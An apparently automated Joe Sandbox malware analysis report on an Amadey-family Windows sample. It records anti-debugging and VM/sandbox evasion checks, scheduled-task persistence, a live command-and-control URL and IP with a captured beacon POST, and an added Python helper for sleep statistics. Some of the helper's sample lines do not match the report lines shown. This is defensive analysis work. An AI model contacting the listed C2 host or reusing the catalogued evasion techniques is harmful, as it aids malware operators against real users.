Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8112 | Thread sleep count: 1230 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8112 | Thread sleep time: -2461230s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7176 | Thread sleep time: -360000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8108 | Thread sleep count: 1189 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8108 | Thread sleep time: -2379189s >= -30000s
Source: C:\Users\user\Desktop\file.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Thread delayed: delay time: 180000
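The per-thread sleep lines above carry more than the threshold comparison the sandbox prints. Dividing each accumulated figure by its call count gives the interval of the individual call (66033 / 33 = 2001, 15750000 / 525 = 30000), which tells an analyst whether the sample is looping many short sleeps, which sleep skipping handles well, or issuing a few long ones, and how long the longest thread would stall a run. The following is an added helper, not part of the report and not Joe Sandbox code; it parses lines copied from the report and pairs count and time per TID. Assumptions made here: the accumulated figure is count times interval in milliseconds (the "s" suffix is treated as a label, since the ratios come out as whole numbers and the 30000 interval matches the "Thread delayed: delay time: 30000" line), and the minus sign is the relative-time convention of NtDelayExecution.

```python
"""Per-thread sleep budget from Joe Sandbox "Thread sleep" lines.

Added example; not part of the report and not Joe Sandbox code.  For each
thread the report prints a sleep count and an accumulated sleep time that
it compares against its 30000 threshold.  Pairing the two per TID recovers
the interval of each individual call, which is what an analyst needs when
deciding how to tune sleep skipping.  Assumption: the accumulated figure is
count x interval in milliseconds (the "s" suffix is treated as a label
because the ratios are whole numbers, 66033 / 33 = 2001), and the minus
sign is the relative-time convention of NtDelayExecution.
"""
import re

# Constructed input: lines copied from the report above (fused form as extracted;
# the "path | signature" form is accepted as well).
SAMPLE_LINES = [
    r"Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeThread delayed: delay time: 180000",
    r"Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8124Thread sleep count: 33 > 30",
    r"Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8124Thread sleep time: -66033s >= -30000s",
    r"Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8104Thread sleep count: 1176 > 30",
    r"Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8104Thread sleep time: -2353176s >= -30000s",
    r"Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8084Thread sleep count: 525 > 30",
    r"Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8084Thread sleep time: -15750000s >= -30000s",
    r"Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7176Thread sleep time: -360000s >= -30000s",
    r"Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeThread delayed: delay time: 30000",
]

SLEEP_RE = re.compile(
    r"TID:\s*(?P<tid>\d+)\s*\|?\s*Thread sleep (?P<kind>count|time): "
    r"(?P<value>-?\d+)s?\s*>=?\s*(?P<threshold>-?\d+)s?"
)
DELAY_RE = re.compile(r"Thread delayed: delay time: (?P<ms>\d+)")


def parse_sleeps(lines):
    """Map TID -> {"count", "total_ms"} from the count/time line pairs."""
    per_tid = {}
    for line in lines:
        m = SLEEP_RE.search(line)
        if not m:
            continue
        entry = per_tid.setdefault(int(m["tid"]), {"count": None, "total_ms": None})
        value = abs(int(m["value"]))  # drop the relative-time sign
        if m["kind"] == "count":
            entry["count"] = value
        else:
            entry["total_ms"] = value
    return per_tid


def delay_intervals(lines):
    """Single-call delays the sandbox reported directly, in ms, sorted."""
    return sorted({int(m["ms"]) for m in map(DELAY_RE.search, lines) if m})


def interval_ms(entry):
    """Per-call interval when count and total are both known and divide evenly."""
    count, total = entry["count"], entry["total_ms"]
    if count and total is not None and total % count == 0:
        return total // count
    return None


def wall_clock_seconds(per_tid):
    """Threads sleep concurrently, so the sample outlasts the sandbox by the
    longest single thread budget, not by the sum over threads."""
    totals = [e["total_ms"] for e in per_tid.values() if e["total_ms"] is not None]
    return max(totals) / 1000 if totals else 0.0


def summarize(lines):
    per_tid = parse_sleeps(lines)
    return {
        tid: {"count": e["count"], "total_ms": e["total_ms"], "interval_ms": interval_ms(e)}
        for tid, e in per_tid.items()
    }


if __name__ == "__main__":
    summary = summarize(SAMPLE_LINES)
    seen = delay_intervals(SAMPLE_LINES)
    for tid, e in sorted(summary.items()):
        note = "" if e["interval_ms"] in seen else " (interval not among reported delays)"
        print(f"TID {tid}: {e['count']} calls x {e['interval_ms']} ms = {e['total_ms']} ms{note}")
    print(f"longest thread budget: {wall_clock_seconds(parse_sleeps(SAMPLE_LINES)) / 3600:.1f} h")
```

On the lines above the result is one thread of 525 calls at 30 s each, a 4.4 hour budget that no fixed run time survives without sleep skipping, next to several threads of roughly 1200 calls at 2 s each, which is the pattern that defeats naive skipping (each call is below a "long sleep" threshold) and has to be handled by counting calls instead.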
Source: axplong.exe, axplong.exe, 00000006.00000002.2621476181.0000000000603000.00000040.00000001.01000000.00000007.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: axplong.exe, 00000006.00000002.2627219543.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000002.2627219543.0000000000C69000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.1418391064.0000000000213000.00000040.00000001.01000000.00000003.sdmp, axplong.exe, 00000002.00000002.1443906022.0000000000603000.00000040.00000001.01000000.00000007.sdmp, axplong.exe, 00000006.00000002.2621476181.0000000000603000.00000040.00000001.01000000.00000007.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: C:\Users\user\Desktop\file.exe | System information queried: ModuleInformation
Source: C:\Users\user\Desktop\file.exe | Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\file.exe; Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe; Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe; Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe; Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe; Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe; Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe; Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe; Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe; Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe; Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe; Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe; File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe; File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe; File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe; Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe; Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe; Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe; Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe; Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe; Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe; Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe; Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe; Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe; Code function: 0_2_05410BDB rdtsc 0_2_05410BDB
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe; Code function: 6_2_0043645B mov eax, dword ptr fs:[00000030h] 6_2_0043645B
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe; Code function: 6_2_0043A1C2 mov eax, dword ptr fs:[00000030h] 6_2_0043A1C2
Source: C:\Users\user\Desktop\file.exe; Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
Source: file.exe, 00000000.00000002.1418391064.0000000000213000.00000040.00000001.01000000.00000003.sdmp, axplong.exe, 00000002.00000002.1443906022.0000000000603000.00000040.00000001.01000000.00000007.sdmp, axplong.exe, 00000006.00000002.2621476181.0000000000603000.00000040.00000001.01000000.00000007.sdmp; Binary or memory string: -](Program Manager
Source: axplong.exe; Binary or memory string: -](Program Manager
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe; Code function: 6_2_0041D312 cpuid 6_2_0041D312
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe; Queries volume information: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe; Code function: 6_2_0041CB1A GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime, 6_2_0041CB1A

                  Stealing of Sensitive Information

Source: Yara match; File source: 0.2.file.exe.10000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 6.2.axplong.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 2.2.axplong.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000002.00000003.1403500499.0000000004A60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000006.00000003.1963827399.0000000004910000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000003.1378088248.0000000005200000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.1418313558.0000000000011000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match; File source: 00000006.00000002.2617522656.0000000000401000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000002.1443822866.0000000000401000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
MITRE ATT&CK Matrix (a number in parentheses is the count of matched signatures for that technique; techniques without a number were not matched):
Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
Execution: Command and Scripting Interpreter (2); Scheduled Task/Job (1); At; Cron; Launchd; Scheduled Task; Systemd Timers
Persistence: Scheduled Task/Job (1); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
Privilege Escalation: Process Injection (12); Scheduled Task/Job (1); DLL Side-Loading (1); Login Hook; Network Logon Script; RC Scripts; Startup Items
Defense Evasion: Masquerading (1); Virtualization/Sandbox Evasion (251); Process Injection (12); Obfuscated Files or Information (2); Software Packing (12); DLL Side-Loading (1); Compile After Delivery
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
Discovery: System Time Discovery (1); Security Software Discovery (741); Process Discovery (2); Virtualization/Sandbox Evasion (251); Application Window Discovery (1); File and Directory Discovery (1); System Information Discovery (224)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
Collection: Archive Collected Data (1); Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
Command and Control: Encrypted Channel (1); Ingress Tool Transfer (1); Non-Application Layer Protocol (1); Application Layer Protocol (11); Fallback Channels; Multiband Communication; Commonly Used Port
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery
Antivirus detection for the submitted sample (Source; Detection; Scanner; Label):
file.exe; 53%; ReversingLabs; Win32.Packed.Themida
file.exe; 100%; Avira; TR/Crypt.TPM.Gen
file.exe; 100%; Joe Sandbox ML
Antivirus detection for dropped files (Source; Detection; Scanner; Label):
C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe; 100%; Avira; TR/Crypt.TPM.Gen
C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe; 100%; Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe; 53%; ReversingLabs; Win32.Packed.Themida
                  No Antivirus matches
                  No Antivirus matches
                  No Antivirus matches
                  No contacted domains info
Contacted URLs (Name; Malicious; Antivirus Detection; Reputation):
http://185.215.113.16/Jo89Ku7d/index.php; true; none; unknown
URLs found in memory or binary data (Name; Source; Malicious; Antivirus Detection; Reputation):
http://185.215.113.16/Jo89Ku7d/index.phpM; axplong.exe, 00000006.00000002.2627219543.0000000000C8E000.00000004.00000020.00020000.00000000.sdmp; false; none; unknown
http://185.215.113.16/Jo89Ku7d/index.phpOF_i; axplong.exe, 00000006.00000002.2627219543.0000000000C8E000.00000004.00000020.00020000.00000000.sdmp; false; none; unknown
http://185.215.113.16/Jo89Ku7d/index.phpded; axplong.exe, 00000006.00000002.2627219543.0000000000C8E000.00000004.00000020.00020000.00000000.sdmp; false; none; unknown
http://185.215.113.16/Jo89Ku7d/index.phpncoded6; axplong.exe, 00000006.00000002.2627219543.0000000000C8E000.00000004.00000020.00020000.00000000.sdmp; false; none; unknown
http://185.215.113.16/Jo89Ku7d/index.phpE; axplong.exe, 00000006.00000002.2627219543.0000000000C69000.00000004.00000020.00020000.00000000.sdmp; false; none; unknown
http://185.215.113.16/Jo89Ku7d/index.phpD; axplong.exe, 00000006.00000002.2627219543.0000000000C69000.00000004.00000020.00020000.00000000.sdmp; false; none; unknown
http://185.215.113.16/Jo89Ku7d/index.phpQ; axplong.exe, 00000006.00000002.2627219543.0000000000C69000.00000004.00000020.00020000.00000000.sdmp; false; none; unknown
http://185.215.113.16/Jo89Ku7d/index.phpncoded; axplong.exe, 00000006.00000002.2627219543.0000000000C8E000.00000004.00000020.00020000.00000000.sdmp; false; none; unknown
http://185.215.113.16/Jo89Ku7d/index.phpncodedn; axplong.exe, 00000006.00000002.2627219543.0000000000C8E000.00000004.00000020.00020000.00000000.sdmp; false; none; unknown
Contacted IPs (IP; Domain; Country; ASN; ASN Name; Malicious):
185.215.113.16; unknown; Portugal; 206894; WHOLESALECONNECTIONSNL; true
                                      Joe Sandbox version:41.0.0 Charoite
                                      Analysis ID:1520516
                                      Start date and time:2024-09-27 12:53:07 +02:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 5m 35s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:9
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:file.exe
                                      Detection:MAL
                                      Classification:mal100.troj.spyw.evad.winEXE@4/3@0/1
                                      EGA Information:
                                      • Successful, ratio: 33.3%
                                      HCA Information:Failed
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe
                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                      • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target axplong.exe, PID 7576 because there are no executed functions
• Execution Graph export aborted for target file.exe, PID 7352 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                      • VT rate limit hit for: file.exe
Timeline (Time; Type; Description):
06:55:01; API Interceptor; 234084x Sleep call for process: axplong.exe modified
11:54:03; Task Scheduler; Run new task: axplong path: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Context for contacted IP 185.215.113.16 (Associated Sample Name / URL; Detection; Threat Name; Context):
• file.exe; malicious; Amadey; 185.215.113.16/Jo89Ku7d/index.php
• file.exe; malicious; Amadey; 185.215.113.16/Jo89Ku7d/index.php
• 8y4qT1eVpi.exe; malicious; Amadey, Stealc; 185.215.113.16/soka/random.exe
• file.exe; malicious; Amadey; 185.215.113.16/Jo89Ku7d/index.php
• file.exe; malicious; Amadey; 185.215.113.16/Jo89Ku7d/index.php
• file.exe; malicious; Amadey; 185.215.113.16/Jo89Ku7d/index.php
• file.exe; malicious; Amadey; 185.215.113.16/Jo89Ku7d/index.php
• file.exe; malicious; LummaC, Amadey, CryptOne, LummaC Stealer, PureLog Stealer, RedLine, Socks5Systemz; 185.215.113.16/Jo89Ku7d/index.php
• file.exe; malicious; Amadey; 185.215.113.16/Jo89Ku7d/index.php
• file.exe; malicious; Amadey; 185.215.113.16/Jo89Ku7d/index.php
                                      No context
Context for ASN WHOLESALECONNECTIONSNL (Associated Sample Name / URL; Detection; Threat Name; Context):
• file.exe; malicious; Stealc; 185.215.113.37
• file.exe; malicious; Stealc, Vidar; 185.215.113.37
• file.exe; malicious; Amadey; 185.215.113.16
• file.exe; malicious; Amadey; 185.215.113.16
• file.exe; malicious; Stealc; 185.215.113.37
• 8y4qT1eVpi.exe; malicious; Amadey, Stealc; 185.215.113.103
• file.exe; malicious; Stealc; 185.215.113.37
• file.exe; malicious; Amadey; 185.215.113.16
• file.exe; malicious; Stealc, Vidar; 185.215.113.37
• file.exe; malicious; Amadey; 185.215.113.16
                                      No context
                                      No context
                                      Process:C:\Users\user\Desktop\file.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):1942016
                                      Entropy (8bit):7.9506187583481704
                                      Encrypted:false
                                      SSDEEP:49152:ArxiFKgvQhg6nnn9b8Tpwoj03t9E9ru/+1j:VIOig6nn58TZ03z8Sm
                                      MD5:E3AA1042729BC6D0DDBED39DDB48B872
                                      SHA1:D9642336D578F012359BBD1F49C90798A76D92AC
                                      SHA-256:14165C7B3DA199B6B30C325C1906D87578CEEBE57CDA17A1BD87AAE2C1AAF06E
                                      SHA-512:9213373356CD9A9E6BB30F1F434619C1DC16A3EB0BC653860E4E41249C9963145F44EA3D2327C7EE6EE5B7DCCF8126957699845357E7BB689F8F532EC263F33E
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 53%
                                      Reputation:low
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L....@.f..............................M...........@..........................@M.....kF....@.................................W...k.............................L...............................L..................................................... . ............................@....rsrc...............................@....idata ............................@... ..+.........................@...wpzcbdbk.....p2.....................@...remsbmyf......M......z..............@....taggant.0....M.."..................@...........................................................................................................................................................................................................................
                                      Process:C:\Users\user\Desktop\file.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:modified
                                      Size (bytes):26
                                      Entropy (8bit):3.95006375643621
                                      Encrypted:false
                                      SSDEEP:3:ggPYV:rPYV
                                      MD5:187F488E27DB4AF347237FE461A079AD
                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                      Malicious:true
                                      Reputation:high, very likely benign file
                                      Preview:[ZoneTransfer]....ZoneId=0
                                      Process:C:\Users\user\Desktop\file.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):280
                                      Entropy (8bit):3.408034611741788
                                      Encrypted:false
                                      SSDEEP:6:vRqKSt5XflNyMsUEZ+lX1lOJUPelkDdtFYSoQI/uy0lb2Et0:UKSvfqMsQ1lOmeeDQQI/uVqEt0
                                      MD5:441DFAF890D059FAEEDBFD246877AA7D
                                      SHA1:6E86D3C059788940AA93E0CF8DBDC0D99334F59E
                                      SHA-256:DB4C6519ABBA13F7B5D8FDF1F73EF2649C76E759D139CB658E5F5D0E859CB1A3
                                      SHA-512:7E741F5A4EF45B97043EFFD4FB3996A2C7DA486B8C21E78FBBFB4D0CF7B64D1B853D392CC6C3F808FECEF9D157703B489CEABD408DD60B4701D84482480303FB
                                      Malicious:false
                                      Reputation:low
                                      Preview:....1S..N.C.7...d.F.......<... .....s.......... ....................8.C.:.\.U.s.e.r.s.\.t.i.n.a.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.4.4.1.1.1.d.b.c.4.9.\.a.x.p.l.o.n.g...e.x.e.........T.I.N.A.-.P.C.\.t.i.n.a...................0.................7.@3P.........................
                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Entropy (8bit):7.9506187583481704
                                      TrID:
                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                      • DOS Executable Generic (2002/1) 0.02%
                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                      File name:file.exe
                                      File size:1'942'016 bytes
                                      MD5:e3aa1042729bc6d0ddbed39ddb48b872
                                      SHA1:d9642336d578f012359bbd1f49c90798a76d92ac
                                      SHA256:14165c7b3da199b6b30c325c1906d87578ceebe57cda17a1bd87aae2c1aaf06e
                                      SHA512:9213373356cd9a9e6bb30f1f434619c1dc16a3eb0bc653860e4e41249c9963145f44ea3d2327c7ee6ee5b7dccf8126957699845357e7bb689f8f532ec263f33e
                                      SSDEEP:49152:ArxiFKgvQhg6nnn9b8Tpwoj03t9E9ru/+1j:VIOig6nn58TZ03z8Sm
                                      TLSH:9A9533EFBC2B68EFC86F53379F55D12C75284A5CAA9A09DB6B04636200276D17630FD0
                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>................
                                      Icon Hash:00928e8e8686b000
                                      Entrypoint:0x8d1000
                                      Entrypoint Section:.taggant
                                      Digitally signed:false
                                      Imagebase:0x400000
                                      Subsystem:windows gui
                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                      DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                      Time Stamp:0x66A240BE [Thu Jul 25 12:10:38 2024 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:6
                                      OS Version Minor:0
                                      File Version Major:6
                                      File Version Minor:0
                                      Subsystem Version Major:6
                                      Subsystem Version Minor:0
                                      Import Hash:2eabe9054cad5152567f0699947a2c5b
                                      Instruction
Data directories (Name; Virtual Address; Virtual Size; Is in Section):
IMAGE_DIRECTORY_ENTRY_EXPORT; 0x0; 0x0
IMAGE_DIRECTORY_ENTRY_IMPORT; 0x6a057; 0x6b; .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE; 0x69000; 0x1e0; .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION; 0x0; 0x0
IMAGE_DIRECTORY_ENTRY_SECURITY; 0x0; 0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC; 0x4cf414; 0x10; wpzcbdbk
IMAGE_DIRECTORY_ENTRY_DEBUG; 0x0; 0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT; 0x0; 0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR; 0x0; 0x0
IMAGE_DIRECTORY_ENTRY_TLS; 0x4cf3c4; 0x18; wpzcbdbk
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG; 0x0; 0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT; 0x0; 0x0
IMAGE_DIRECTORY_ENTRY_IAT; 0x0; 0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT; 0x0; 0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR; 0x0; 0x0
IMAGE_DIRECTORY_ENTRY_RESERVED; 0x0; 0x0
                                      Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                      (unnamed) | 0x1000 | 0x68000 | 0x2de00 | 2b7b72fd401673c787b6d8cf7bbc8dc1 | False | 0.9972060200953679 | data | 7.979919668265035 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .rsrc | 0x69000 | 0x1e0 | 0x200 | 375348566cb70a830eaa7067e63c58cd | False | 0.58203125 | data | 4.495148590062898 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .idata | 0x6a000 | 0x1000 | 0x200 | cc76e3822efdc911f469a3e3cc9ce9fe | False | 0.1484375 | data | 1.0428145631430756 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      (unnamed) | 0x6b000 | 0x2bc000 | 0x200 | 74ae95edef2eb00e11e5bcdb912774da | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      wpzcbdbk | 0x327000 | 0x1a9000 | 0x1a8600 | a14b57d42f66a7b77f448f190bb8b237 | False | 0.9945939571060383 | data | 7.953456823391056 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      remsbmyf | 0x4d0000 | 0x1000 | 0x600 | d8935feeaa93faf32d1c01e3b500b42d | False | 0.57421875 | zlib compressed data | 4.901257383568305 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .taggant | 0x4d1000 | 0x3000 | 0x2200 | 4bc813bb3f250935e4bebbaa88c2266f | False | 0.054457720588235295 | DOS executable (COM) | 0.6440756663242801 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                      RT_MANIFEST | 0x4cf424 | 0x17d | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.5931758530183727
                                      DLL | Import
                                      kernel32.dll | lstrcpy
                                      Language of compilation system | Country where language is spoken | Map
                                      English | United States |
                                      Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                      2024-09-27T12:55:12.578966+0200 | 2856147 | ETPRO MALWARE Amadey CnC Activity M3 | 1 | 192.168.2.9 | 49711 | 185.215.113.16 | 80 | TCP
                                      Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                      • 185.215.113.16
                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      0 | 192.168.2.9 | 49711 | 185.215.113.16 | 80 | 8080 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Sep 27, 2024 12:55:11.460354090 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      Host: 185.215.113.16
                                      Content-Length: 4
                                      Cache-Control: no-cache
                                      Data Raw: 73 74 3d 73
                                      Data Ascii: st=s
